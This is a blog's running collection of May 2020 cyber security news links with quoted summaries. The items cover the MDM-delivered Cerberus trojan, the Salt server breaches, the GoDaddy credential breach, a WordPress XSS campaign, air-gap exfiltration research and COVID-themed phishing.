This posting is here to collect cyber security news in May 2020.
I post links to security vulnerability news with short descriptions to comments section of this article.
If you are interested in cyber security trends, read my Cyber security trends 2020 posting.
You are also free to post related links to comments.
222 Comments
Tomi Engdahl says:
Hackers breach company’s MDM server to spread Android malware
https://www.bleepingcomputer.com/news/security/hackers-breach-company-s-mdm-server-to-spread-android-malware/
Attackers infected more than 75% of a multinational conglomerate’s managed Android devices with the Cerberus banking trojan using the company’s compromised Mobile Device Manager (MDM) server.
MDM (also known as Enterprise Mobility Management – EMM) is a mechanism used by companies of all sizes to enroll enterprise-owned devices with the same management server to make it easier to perform tasks such as delivering company-wide device configurations, deploying applications, and more.
Once deployed onto an Android device, Cerberus can be used by the attackers to steal a wide range of highly sensitive information
After the attackers successfully compromised the unnamed company’s MDM server following a targeted attack, they used it to remotely deploying the banking trojan malware on over 75% of all managed Android devices as Check Point security researchers discovered.
To get rid of the malware and remove the attackers’ ability to control the infected devices, the company decided to factor reset all devices enrolled with the compromised MDM server.
“This is the first time we have a reported incident of mobile malware distribution that uses the MDM server as an attack vector,” the researchers said.
To get rid of the malware and remove the attackers’ ability to control the infected devices, the company decided to factor reset all devices enrolled with the compromised MDM server.
First Seen In the Wild – Mobile as Attack Vector Using MDM
https://research.checkpoint.com/2020/first-seen-in-the-wild-mobile-as-attack-vector-using-mdm/
Tomi Engdahl says:
Trump bans acquisition of foreign power grid equipment, citing hacking threats
https://www.zdnet.com/article/trump-bans-acquisition-of-foreign-power-grid-equipment-citing-hacking-threats/
White House says foreign-made equipment “augments the ability of foreign adversaries to create and exploit vulnerabilities” in the US power grid.
President Donald Trump signed today an executive order barring US power grid entities from buying and installing electrical equipment that has been manufactured outside the US.
Trump said that “foreign adversaries are increasingly creating and exploiting vulnerabilities in the United States bulk-power system.”
The US president said that successful attacks against the US power grid would “present significant risks to our economy, human health and safety, and would render the United States less capable of acting in defense of itself and its allies.”
Tomi Engdahl says:
Coronavirus: Cyber-spies seek coronavirus vaccine secrets
https://www.bbc.com/news/technology-52490432
The US has seen foreign spy agencies carry out reconnaissance of research into a coronavirus vaccine, a senior US intelligence official has told the BBC.
Bill Evanina, director of the National Counterintelligence and Security Center, said the US government had warned medical research organisations of the risks.
But he would not say whether there had been confirmed cases of stolen data.
Tomi Engdahl says:
https://gizmodo.com/when-your-freedom-depends-on-an-app-1843109198
Tomi Engdahl says:
When your freedom depends on a crappy app, you don’t really have any freedom.
And now they are trying to push contact tracing apps for everybody as solution to COVID-19.
I have now yet made my mind is this an idea that would help or is the proposed medicine worse than the disease?
Tomi Engdahl says:
Customers should apply the April 2020 Critical Patch Update without
delay!
https://blogs.oracle.com/security/apply-april-2020-cpu
Oracle has recently received reports of attempts to maliciously
exploit a number of recently-patched vulnerabilities, including
vulnerability CVE-2020-2883, which affects multiple versions of Oracle
WebLogic Server. Oracle strongly recommends that customers apply the
April 2020 Critical Patch Update. The April 2020 Critical Patch Update
advisory is located at
https://www.oracle.com/security-alerts/cpuapr2020.html
Tomi Engdahl says:
Coronavirus: Cyber-spies seek coronavirus vaccine secrets
https://www.bbc.com/news/technology-52490432
Bill Evanina, director of the National Counterintelligence and
Security Center, said the US government had warned medical research
organisations of the risks. But he would not say whether there had
been confirmed cases of stolen data. UK security sources says they
have also seen similar activity.
Tomi Engdahl says:
Scammers Using COVID-19/Coronavirus Lure to Target Medical Suppliers
https://www.fortinet.com/blog/threat-research/scammers-using-covid-19-coronavirus-lure-to-target-medical-suppliers.html
FortiGuard Labs has discovered a new malicious spearphishing campaign,
once again using the COVID-19/Coronavirus pandemic as a lure. This
latest email campaign targets a medical device supplier, wherein the
attacker is inquiring about various materials needed to address the
COVID-19 pandemic due to high demand for supplies, and includes a
compelling statement that they have already tried to reach the
recipient via telephone in order to create a stronger sense of
urgency. The attachment is a maliciously crafted Word document,
utilizing the infamous CVE-2017-11882 (Office Equation Editor)
vulnerability.
Tomi Engdahl says:
Cybersecurity and the economy: when recession strikes
https://blog.malwarebytes.com/cybercrime/2020/04/cybersecurity-and-the-economy-when-recession-strikes/
Cybercrime and the economy have always been intertwined, but with
COVID-19 on the road to causing a seemingly inevitable global
recession, many are asking what, exactly, will the impact be on
cybercrime. Will criminals step up and increase malware production,
ramp up phishing attacks, do whatever it takes to pull in some cash?
Or will it cause a little downturn in malware making and other dubious
dealings?
Tomi Engdahl says:
Advanced Persistent Threat Golden_hands – Digital Bank Robbery of the
Year 2020
https://www.vulnerability-db.com/?q=articles%2F2020%2F04%2F30%2Fadvanced-persistent-threat-goldenhands-digital-bank-robbery-year-2020
This is a story about advanced persistent threats in Germany and the
European Union during the crisis affecting the finance system and
economy sector.
Tomi Engdahl says:
Threat Spotlight: Malicious use of reCaptcha
https://blog.barracuda.com/2020/04/30/threat-spotlight-malicious-recaptcha/
In the never-ending battle between cybersecurity and cybercrime,
cybercriminals continue to find new techniques to evade detection. One
such trick Barracuda researchers have started seeing more often in
phishing campaigns uses reCaptcha walls to block URL scanning services
from accessing the content of phishing pages.
Tomi Engdahl says:
The Russian Doll of Putin’s Internet Clampdown
https://www.wired.com/story/opinion-the-russian-doll-of-putins-internet-clampdown/
The Kremlin’s path toward censorship, surveillance, and repression has
many more layers than meets the eye.
Tomi Engdahl says:
Hackers breach LineageOS servers via unpatched vulnerability
https://www.zdnet.com/article/hackers-breach-lineageos-servers-via-unpatched-vulnerability/#ftag=RSSbaffb68
Hackers have gained access to the core infrastructure of LineageOS, a
mobile operating system based on Android, used for smartphones,
tablets, and set-top boxes. The intrusion took place last night, on
Saturday, at around 8 pm (US Pacific coast), and was detected before
the attackers could do any harm, the LineageOS team said in a
statement published less than three hours after the incident.
LineageOS developers said the hack took place after the attacker used
an unpatched vulnerability to breach its Salt installation.
Tomi Engdahl says:
Ghost blogging platform suffers security breach
https://www.grahamcluley.com/ghost-blogging-platform-suffers-security-breach/
The open-source blogging platform Ghost has suffered a serious
security scare, no doubt sending shivers down the spines of some of
its users. In a later update on the security breach, Ghost said that
its investigations had determined that attackers had exploited a
critical vulnerability in Salt, the open-source software used by data
centers and cloud servers, in an attempt to mine cryptocurrency on its
servers. also: https://status.ghost.org/incidents/tpn078sqk973
Tomi Engdahl says:
Canadians have lost more than $1.2 million to COVID-19 scams
https://www.cbc.ca/news/politics/covid-scams-fraud-crime-1.5551294
Jeff Thomson of the Canadian Anti-Fraud Centre said the centre has
received 739 reports since March 6 of attempts to defraud Canadians
with scams related to the pandemic. He said 178 of those attempts
succeeded. The centre is also seeing attempts to use the pandemic as
cover to infect computers with malware.
Tomi Engdahl says:
Love Bug’s creator tracked down to repair shop in Manila
https://www.bbc.com/news/technology-52458765
The man behind the world’s first major computer virus outbreak has
admitted his guilt, 20 years after his software infected millions of
machines worldwide.
Tomi Engdahl says:
2020 Gartner Magic Quadrant for Application Security Testing
https://www.synopsys.com/software-integrity/resources/analyst-reports/2020-gartner-magic-quadrant.html?cmp=em-sig-gartnermq&utm_medium=email&utm_source=website
Synopsys is a Leader for the Fourth Year in a Row
Synopsys Placed Highest for Ability to Execute and Furthest to the Right for Completeness of Vision
Tomi Engdahl says:
Recent Salt Vulnerabilities Exploited to Hack LineageOS, Ghost, DigiCert Servers
By Ionut Arghire on May 04, 2020
https://www.securityweek.com/recent-salt-vulnerabilities-exploited-hack-lineageos-ghost-digicert-servers
Over the past several days, hackers have exploited two recently disclosed Salt vulnerabilities to compromise the servers of LineageOS, Ghost and DigiCert.
Managed by SaltStack, Salt is an open-source configuration tool to monitor and update the state of servers in both datacenters and cloud environments. Called minions, agents installed on servers connect to a master to deliver state reports (to a “request server”) and receive updates (from a “publish server”).
Last week, F-Secure security researchers disclosed two vulnerabilities in Salt (CVE-2020-11651 and CVE-2020-11652) that could allow remote attackers to execute commands as root on “master” and connected minions. The most severe of the bugs has a CVSS score of 10.
The vulnerabilities could allow an attacker to bypass authentication and authorization controls, “and publish arbitrary control messages, read and write files anywhere on the ‘master’ server filesystem and steal the secret key used to authenticate to the master as root,” F-Secure said last week.
Tomi Engdahl says:
This new cybersecurity school will teach kids to crack codes from home
https://www.zdnet.com/article/this-new-cybersecurity-school-will-teach-kids-to-crack-codes-from-home/
Online initiative looks to inspire a new generation of cybersecurity talent to bring out their ‘digital Sherlock Holmes’ while schools remain closed.
Tomi Engdahl says:
Several Vulnerabilities Patched With Release of WordPress 5.4.1
https://www.securityweek.com/several-vulnerabilities-patched-release-wordpress-541
Several vulnerabilities, most of which have been described as cross-site scripting (XSS) flaws, have been patched in WordPress this week with the release of version 5.4.1.
WordPress 5.4.1, described as a short-cycle security and maintenance release, fixes 17 bugs and 7 vulnerabilities affecting version 5.4 and earlier. WordPress developers pointed out that all versions newer than 3.7 have been updated as well.
Tomi Engdahl says:
Criminals Quick to Exploit COVID-19 Crisis in Europe
https://www.securityweek.com/criminals-quick-exploit-covid-19-crisis-europe
Tomi Engdahl says:
EU Demands End to Coronavirus Cyberattacks
https://www.securityweek.com/eu-demands-end-coronavirus-cyberattacks
The European Union on Thursday accused unnamed parties of exploiting the coronavirus pandemic to launch cyberattacks on infrastructure and healthcare services.
A flood of cyberattacks has targeted European countries, affecting critical systems needed to deal with the virus crisis, said foreign policy chief Josep Borrell in a statement on behalf of all 27 EU members.
“The European Union and its Member States condemn this malicious behaviour in cyberspace,” Borrell said.
“Any attempt to hamper the ability of critical infrastructures is unacceptable. All perpetrators must immediately refrain from conducting such irresponsible and destabilising actions, which can put people’s lives at risk.”
Earlier this month the United States voiced concern about cyber assaults targeting Czech hospitals — several of which managed to fight off attempted attacks.
Internet users have seen a surge in COVID-related attacks and fraud schemes, including phishing emails purportedly from health agencies, counterfeit product offers and bogus charity donation requests.
Tomi Engdahl says:
Geoff White / BBC:
Filipino Onel de Guzman, author of the Love Bug worm that infected millions of PCs in May 2000, talks about his creation and claims he regrets writing it — The man behind the world’s first major computer virus outbreak has admitted his guilt, 20 years after his software infected millions of machines worldwide.
Love Bug’s creator tracked down to repair shop in Manila
https://www.bbc.com/news/technology-52458765
Tomi Engdahl says:
Punainen verkko: Venäjä piirtää valtiollisia rajoja bittiavaruuteen
https://ulkopolitist.fi/2020/05/04/venaja-piirtaa-valtiollisia-rajoja-bittiavaruuteen/
Venäjä haluaa saavuttaa digitaalisen itsenäisyyden vuoteen 2024
mennessä ja rakentaa siksi kansallista internetiä. Venäjän oma,
kansallinen internet on neuvostoliittolaisista juurista kumpuava
projekti, joka voisi antaa mallia niille autoritaarisille valtioille,
jotka miettivät, miten ottaa internet valtion hallintaan. Internetin
“kansallistamiset” muuttaisivat merkittävästi maailmanlaajuisen
tietoverkon luonnetta.
Tomi Engdahl says:
New Malware Jumps Air-Gapped Devices by Turning Power-Supplies into
Speakers
https://thehackernews.com/2020/05/air-gap-malware-power-speaker.html
A researcher from Israel’s Ben Gurion University of the Negev recently
demonstrated a new kind of malware that could be used to covertly
steal highly sensitive data from air-gapped and audio-gapped systems
using a novel acoustic quirk in power supply units that come with
modern computing devices. Dubbed ‘POWER-SUPPLaY, ‘ the latest research
builds on a series of techniques leveraging electromagnetic, acoustic,
thermal, optical covert channels, and even power cables to exfiltrate
data from non-networked computers.
Tomi Engdahl says:
Denmark, Sweden, Germany, the Netherlands and France SIGINT Alliance
https://www.schneier.com/blog/archives/2020/05/denmark_sweden_.html
This paper describes a SIGINT and code-breaking alliance between
Denmark, Sweden, Germany, the Netherlands and France called Maximator.
paper:
https://www.tandfonline.com/doi/full/10.1080/02684527.2020.1743538
Tomi Engdahl says:
OK, so you’ve air-gapped that PC. Cut the speakers. Covered the LEDs. Disconnected the monitor. Now, about the data-leaking power supply unit…
I have no mouth, and I must scream
https://www.theregister.co.uk/2020/05/04/power_supply_attack/
Tomi Engdahl says:
Older power supply information leakage links
https://www.researchgate.net/publication/324472268_PowerHammer_Exfiltrating_Data_from_Air-Gapped_Computers_through_Power_Lines
https://www.zdnet.com/article/how-safe-is-your-air-gapped-pc-attackers-can-now-suck-data-out-via-power-lines/
Tomi Engdahl says:
TP-Link Patches Multiple Vulnerabilities in NC Cloud Cameras
https://www.securityweek.com/tp-link-patches-multiple-vulnerabilities-nc-cloud-cameras
Tomi Engdahl says:
Most Malicious Coronavirus-Related Domains Located in U.S.
https://www.securityweek.com/most-malicious-coronavirus-related-domains-located-us
Tomi Engdahl says:
Power Supply Can Turn Into Speaker for Data Exfiltration Over Air Gap
https://www.securityweek.com/power-supply-can-turn-speaker-data-exfiltration-over-air-gap
Tomi Engdahl says:
New Executive Order Aims to Protect U.S. Power Grid From Backdoored Equipment
https://www.securityweek.com/new-executive-order-aims-protect-us-power-grid-backdoored-equipment
A new executive order signed on Friday by U.S. President Donald Trump prohibits the acquisition of bulk-power system equipment that could contain intentional backdoors planted by foreign adversaries.
Incidents where threat actors targeted a country’s power grid and even caused disruptions are not unheard of, and even the United States reportedly targeted Russia’s grid in such attacks.
The U.S. government appears to be concerned that foreign adversaries could be trying to plant malicious or vulnerable equipment in the country’s power grid. That is why the latest executive order prohibits the acquisition of bulk-power system electric equipment that is designed, developed, manufactured or supplied by an entity that is “controlled by, or subject to the jurisdiction or direction of a foreign adversary.”
Tomi Engdahl says:
Godaddy Hacked : 19 Million Customers at Risk
https://hackernewsdog.com/godaddy-hacked-breached-stolen-data/?fbclid=IwAR2h5XuWSsnrC8HHsDqGSyF2S2GEIVQnxh0F-T5YkWNaSBiiBPZ35Yu5Bc4
Big Breaking News Just coming In
Godaddy Just confirmed its data breach on 5 May 2020 putting 19 million customers on risk.
One of the biggest domain registrar and web hosting firm godaddy today publicly announced its data breach that impacted millions of hosting account customers. This incident goes back to the date October 2019 when enabled one hacker to access some customer’s login information of SSH of hosting account. Later the security team of the godaddy company observed suspicious activity on some accounts.
Although the company said “It did not impact main customer accounts” , although why are not sure what do they mean by saying “main customers”.
Tomi Engdahl says:
GoDaddy Hack Breaches Hosting Account Credentials
https://threatpost.com/godaddy-hack-breaches-hosting-account-credentials/155475/
The domain registrar giant said that the breach started in October 2019.
GoDaddy, the world’s largest domain name registrar, is warning customers that attackers may have obtained their web hosting account credentials.
An “unauthorized individual” was able to access users’ login details in an intrusion that took place back in October.
Tomi Engdahl says:
New VCrypt Ransomware locks files in password-protected 7ZIPs
https://www.bleepingcomputer.com/news/security/new-vcrypt-ransomware-locks-files-in-password-protected-7zips/
A new ransomware called VCrypt is targeting French victims by
utilizing the legitimate 7zip command-line program to create
password-protected archives of data folders.
Tomi Engdahl says:
Airplane Hack Exposes Weaknesses of Alert and Avoidance Systems
https://threatpost.com/airplane-hack-exposes-weaknesses-of-alert-and-avoidance-systems/155451/
The aircraft safety system known as the Traffic Alert and Collision
Avoidance System (TCAS) can be coerced into sending an airplane on a
mid-air rollercoaster ride much to the horror of those onboard.
Researchers were able to cobble together an effective method for
spoofing the TCAS using a $10 USB-based Digital Video Broadcasting
dongle and a rogue transponder, for communicating with aircraft. “We
have shown that careful placing of fake aircraft through rogue
transponder broadcasts can cause an aircraft under autopilot control
to climb or descend towards legitimate traffic, ” wrote Pen Test
Partners’ Ken Munro in a blog post outlining his research. also:
https://www.pentestpartners.com/security-blog/jeopardising-aircraft-through-tcas-spoofing/
Tomi Engdahl says:
Mitigating vulnerabilities in endpoint network stacks
https://www.microsoft.com/security/blog/2020/05/04/mitigating-vulnerabilities-endpoint-network-stacks/
One aspect of our proactive security work is finding vulnerabilities
and fixing them before they can be exploited. Innovations we’ve made
in our fuzzing technology have made it possible to get deeper coverage
than ever before, resulting in the discovery of new bugs, faster. One
such vulnerability is the remote code vulnerability (RCE) in Microsoft
Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and
fixed on March 12, 2020. In the following sections, we will share the
tools and techniques we used to fuzz SMB, the root cause of the RCE
vulnerability, and relevant mitigations to exploitation.
Tomi Engdahl says:
APT Groups Target Healthcare and Essential Services – Alert
(AA20-126A)
https://www.us-cert.gov/ncas/alerts/AA20126A
CISA and NCSC continue to see indications that advanced persistent
threat (APT) groups are exploiting the Coronavirus Disease 2019
(COVID-19) pandemic as part of their cyber operations. This joint
alert highlights ongoing activity by APT groups against organizations
involved in both national and international COVID-19 responses. It
describes some of the methods these actors are using to target
organizations and provides mitigation advice.
Tomi Engdahl says:
Toll Group hit by ransomware a second time, deliveries affected
https://www.bleepingcomputer.com/news/security/toll-group-hit-by-ransomware-a-second-time-deliveries-affected/
The Toll Group has suffered its second ransomware cyberattack in three
months, with the latest one conducted by the operators of the Nefilim
Ransomware. Toll Group is Asia Pacific’s leading provider of trans
portion and logistics services, employing roughly 44, 000 people at 1,
200 locations in more than 50 countries. also:
https://www.tollgroup.com/toll-it-systems-updates
Tomi Engdahl says:
Malicious Use of AI Poses a Real Cybersecurity Threat
https://www.darkreading.com/vulnerabilities—threats/malicious-use-of-ai-poses-a-real-cybersecurity-threat/a/d-id/1337690
We should prepare for a future in which artificially intelligent
cyberattacks become more common. also:
https://www.foi.se/report-summary?reportNo=FOI-R–4947–SE
Tomi Engdahl says:
Google Android RCE Bug Allows Attacker Full Device Access
https://threatpost.com/google-android-rce-bug-full-device-access/155460/
The vulnerability is one of 39 affecting various aspects of the mobile
OS that the company fixed in a security update this week.
Android’s May 2020 Patches Fix Critical System Vulnerability
https://www.securityweek.com/androids-may-2020-patches-fix-critical-system-vulnerability
Google this week released the May 2020 security patches for the Android operating system, which address several critical vulnerabilities, including one affecting the System component.
A total of 39 vulnerabilities were patched with the release, split into two parts: 15 received fixes as
part of the 2020-05-01 security patch level, and 24 addressed with the 2020-05-05 security patch level.
Tomi Engdahl says:
https://www.forbes.com/sites/daveywinder/2020/05/05/godaddy-confirms-data-breach-what-19-million-customers-need-to-know/
Tomi Engdahl says:
With more than 19 million customers, 77 million domains managed, and millions of websites hosted, most everyone has heard of GoDaddy. According to Bleeping Computer, which broke the news yesterday evening, an as yet unknown number of customers have been informed that their web hosting account credentials had been compromised
https://www.forbes.com/sites/daveywinder/2020/05/05/godaddy-confirms-data-breach-what-19-million-customers-need-to-know/
Tomi Engdahl says:
COVID-19: Cloud Threat Landscape
https://unit42.paloaltonetworks.com/covid-19-cloud-threat-landscape/
Unit 42 researchers analyzed 1.2 million newly registered domain (NRD)
names containing keywords related to the COVID-19 pandemic from March
9, 2020 to April 26, 2020 (7 weeks). 86, 600+ domains are classified
as “risky” or “malicious”, spread across various regions, as shown in
Figure 1. The United States has the highest number of malicious
domains (29, 007), followed by Italy (2, 877), Germany (2, 564), and
Russia (2, 456).
Cyber volunteers release blocklists for 26, 000 COVID-19 threats
https://www.bleepingcomputer.com/news/security/cyber-volunteers-release-blocklists-for-26-000-covid-19-threats/
The COVID-19 Cyber Threat Coalition has released a block list of known
URLs and domain names associated with Coronavirus-themed scams,
phishing attacks, and malware threats. The URL blocklist currently
consists of 13, 863 malicious URLs that have been seen in attacks, and
the domain blocklist now contains 12, 258 malicious domains and
hostnames.
Tomi Engdahl says:
Nearly a Million WP Sites Targeted in Large-Scale Attacks
https://www.wordfence.com/blog/2020/05/nearly-a-million-wp-sites-targeted-in-large-scale-attacks/
Our Threat Intelligence Team has been tracking a sudden uptick in
attacks targeting Cross-Site Scripting(XSS) vulnerabilities that began
on April 28, 2020 and increased over the next few days to
approximately 30 times the normal volume we see in our attack data.
The majority of these attacks appear to be caused by a single threat
actor, based on the payload they are attempting to inject a malicious
JavaScript that redirects visitors and takes advantage of an
administrator’s session to insert a backdoor into the theme’s header.
Nearly 1 Million WordPress Sites Targeted via Old Vulnerabilities
https://www.securityweek.com/nearly-1-million-wordpress-sites-targeted-old-vulnerabilities
A large-scale attack campaign has targeted over 900,000 WordPress websites through vulnerabilities in plugins and themes, WordPress security company Defiant revealed this week.
The attacks were initially discovered on April 28, but showed a massive spike on May 3, when more than half a million websites were hit. Likely the work of a single threat actor, the campaign is aimed at injecting the target websites with malicious JavaScript designed to redirect visitors to malvertising sites.
Responsible for only a small volume of attacks in the past, the threat actor has ramped up the operation, with over 20 million attacks registered on May 3. The researchers discovered that, over the past month, over 24,000 distinct IP addresses were used to attack more than 900,000 sites.
The targeted vulnerabilities are not new and have been abused in previous attacks as well. These include Cross-Site Scripting (XSS) vulnerabilities in the Easy2Map plugin (removed from the WordPress repository in August 2019), Blog Designer (patched in 2019), and Newspaper theme (patched in 2016), and options update bugs in WP GDPR Compliance (patched in late 2018), and Total Donations (removed in early 2019).
The JavaScript code the attackers attempt to insert into the targeted websites is located at count[.]trackstatisticsss[.]com/stm and also checks whether the victim has any WordPress login cookies set. The attackers hope that the script would be executed in an administrator’s browser.
Admins who are not logged in and are not on the login page are redirected to a malvertising site. Otherwise, the script attempts to inject a malicious PHP backdoor into the current theme’s header, along with a second malicious JavaScript.
The backdoor downloads another payload from https://stat.trackstatisticsss.com/n.txt and attempts to execute it by including it in the theme header.
Tomi Engdahl says:
Now we know what the P really stands for in PwC: X-rated ads plastered
over derelict corner of accountants’ website
https://www.theregister.co.uk/2020/05/06/pwc_azure_squatting/
A forgotten subdomain on PricewaterhouseCoopers’ dot-com has been
hijacked to host ads for porno websites and apps, neatly demonstrating
why you should not neglect your corporate DNS records.
Tomi Engdahl says:
DDoS attacks in Q1 2020
https://securelist.com/ddos-attacks-in-q1-2020/96837/
Since the beginning of 2020, due to the COVID-2019 pandemic, life has
shifted almost entirely to the Web people worldwide are now working,
studying, shopping, and having fun online like never before. This is
reflected in the goals of recent DDoS attacks, with the most targeted
resources in Q1 being websites of medical organizations, delivery
services, and gaming and educational platforms.
Tomi Engdahl says:
Credit card skimmer masquerades as favicon
https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/
When it comes to online credit card skimmers, we have already seen a
number of evasion techniques, some fairly simple and others more
elaborate. The goal remains to deceive online shoppers while staying
under the radar from website administrators and security scanners. In
this latest instance, we observed an old server-side trick combined
with the clever use of an icon file to hide a web skimmer. Threat
actors registered a new website purporting to offer thousands of
images and icons for download, but which in reality has a single
purpose: to act as a façade for a credit card skimming operation.
Tomi Engdahl says:
Now That Everyone’s Working From Home, How’s Your Helpdesk Holding Up?
https://www.securityweek.com/now-everyones-working-home-hows-your-helpdesk-holding
Tomi Engdahl says:
As Healthcare Industry Transforms Overnight, Tech Community Must Act
https://www.securityweek.com/healthcare-industry-transforms-overnight-tech-community-must-act
The Technology Industry Must Come Together to Help Healthcare Meet the Challenges Sparked by he COVID-19 Outbreak